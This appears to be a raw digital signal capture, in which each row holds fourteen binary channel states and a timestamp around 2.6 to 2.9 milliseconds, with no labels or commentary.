0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6441160e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6441400e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6441640e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6441880e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6442160e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6442400e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6442920e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6443160e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.6443200e-03 0,0,1,0,0,1,0,0,0,1,0,0,1,0,2.6443400e-03 0,0,1,0,0,1,0,0,0,1,0,0,0,0,2.6443640e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6443720e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6443880e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6444160e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6444400e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6444680e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6445160e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6445400e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6445640e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6445880e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6446440e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6446680e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6447160e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6447400e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6447880e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6448160e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6448400e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6448680e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6448920e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6449160e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6449400e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6449640e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6449880e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6450160e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6450400e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6450680e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6450920e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6451160e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6451400e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6451640e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6451880e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6452160e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6452400e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6452680e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6452920e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6453160e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6453400e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6453640e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6453880e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6454160e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6454400e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6454680e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6454920e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6455160e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6455400e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6455640e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6455880e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6456160e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6456400e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6456680e-03 0,0,1,0,0,0,0,0,0,0,0,0,1,0,2.6456920e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,0,2.6457160e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,1,2.7699240e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,1,2.7701080e-03 1,0,1,0,0,0,0,0,0,0,0,1,0,1,2.7701400e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,1,2.7701600e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,1,2.7704760e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,1,2.7705040e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,1,2.7705280e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,1,2.7705560e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,1,2.7706040e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,1,2.7706280e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,1,2.7706360e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,1,2.7706760e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,1,2.7707040e-03 1,0,1,0,0,1,0,0,0,0,0,0,0,1,2.7707080e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,1,2.7707120e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7707560e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7707800e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7708040e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7708280e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7708520e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7708760e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7708840e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7709280e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7709560e-03 1,0,1,0,0,1,0,0,0,0,0,0,0,0,2.7709600e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7709640e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7710040e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7710280e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7710360e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7710520e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7710760e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7711000e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7711280e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7711560e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7711800e-03 1,0,1,0,0,1,0,0,0,0,0,0,0,0,2.7711840e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7711880e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7712280e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7712520e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7712760e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7713040e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7713080e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7713560e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7713800e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7713880e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7714040e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7714280e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7714520e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7714760e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7715040e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7715280e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7715560e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7715800e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7716040e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7716280e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7716520e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7716760e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7717040e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7717280e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7717560e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7717800e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7718280e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7718520e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7718600e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7719040e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7719280e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7719360e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7719800e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7720040e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7720280e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7720520e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7720760e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7721040e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7721280e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7721560e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7721800e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7722080e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7722360e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7722600e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7722840e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7723080e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7723320e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7723560e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7723800e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7724080e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7724360e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7724600e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7724840e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7725080e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7725120e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7725560e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7725840e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7725880e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7726080e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7726360e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7726560e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7726840e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7727080e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7727320e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7727400e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7727840e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7728080e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7728160e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7728320e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7728560e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7729080e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7729320e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7729400e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7729560e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7729800e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7729880e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7730080e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7730280e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7730600e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7730800e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7730880e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7731360e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7731600e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7731680e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7731880e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7732120e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7732360e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7732600e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7733120e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7733360e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7733400e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7733600e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7733880e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7734120e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7734360e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7734600e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7734840e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7735080e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7735360e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7735400e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7735880e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7736120e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7736360e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7736600e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7736840e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7737080e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7737360e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7737600e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7737880e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7738120e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7738360e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7738600e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7738840e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7739080e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7739360e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7739600e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7739880e-03 1,0,1,0,0,0,0,0,0,1,0,0,0,0,2.7740120e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7740160e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7740600e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7740840e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7740920e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7741360e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7741640e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7741880e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7742120e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7742360e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7742600e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7742840e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7743160e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7743640e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7743880e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7744120e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7744360e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7744600e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7744840e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7745160e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7745360e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7745600e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7745880e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7746360e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7746600e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7746680e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7746840e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7747160e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7747360e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7747600e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7747880e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7748120e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7748360e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7748600e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7748840e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7749160e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7749360e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7749600e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7749640e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7750120e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7750360e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7750440e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7750600e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7750840e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7751120e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7751360e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7751600e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7751880e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7752360e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7752600e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7752680e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7753160e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7753360e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7753440e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7753640e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7753880e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7754120e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7754360e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7754640e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7754880e-03 1,0,1,0,0,1,0,0,0,0,0,0,0,0,2.7754920e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7754960e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7755400e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7755640e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7755880e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7756120e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7756200e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7756640e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7756880e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7756960e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7757160e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7757400e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7757640e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7757880e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7758360e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7758640e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7758680e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7758880e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7759160e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7759200e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7759400e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7759640e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7759880e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7760120e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7760360e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7760640e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7760880e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7761160e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7761640e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7761880e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7761960e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7762360e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7762640e-03 1,0,1,0,0,1,0,0,0,0,0,0,0,0,2.7762680e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7762720e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7763160e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7763400e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7763640e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7763880e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7764120e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7764360e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7764440e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7764880e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7765160e-03 1,0,1,0,0,1,0,0,0,0,0,0,0,0,2.7765200e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7765240e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7765640e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7765880e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7765960e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7766120e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7766360e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7766640e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7766880e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,2.7767160e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,2.7767440e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7767480e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7767960e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7768200e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7768440e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7768680e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7768920e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7769160e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7769440e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7769680e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7769920e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7770200e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7770440e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7770680e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7770920e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7771160e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7771440e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7771680e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7771960e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7772200e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7772440e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7772680e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7772920e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7773160e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7773440e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7773680e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7773920e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7774200e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7774440e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7774680e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7774920e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7775160e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7775440e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7775680e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7775960e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7776200e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,2.7776440e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,2.7776680e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,1,2.9018280e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,1,2.9020440e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,1,2.9020640e-03 0,1,1,0,0,0,0,0,0,0,0,1,0,1,2.9020920e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,1,2.9021160e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,1,2.9024280e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,1,2.9024520e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,1,2.9024760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,1,2.9025000e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,1,2.9025080e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,1,2.9025240e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,1,2.9025480e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,1,2.9025760e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,1,2.9026000e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,1,2.9026280e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,1,2.9026520e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,1,2.9026600e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,1,2.9027000e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9027240e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9027520e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9027760e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9027800e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.9028000e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9028280e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.9028520e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9028760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9028840e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9029000e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9029240e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9029480e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9029760e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9030040e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9030280e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.9030760e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9031000e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9031080e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.9031240e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.9031480e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.9031560e-03 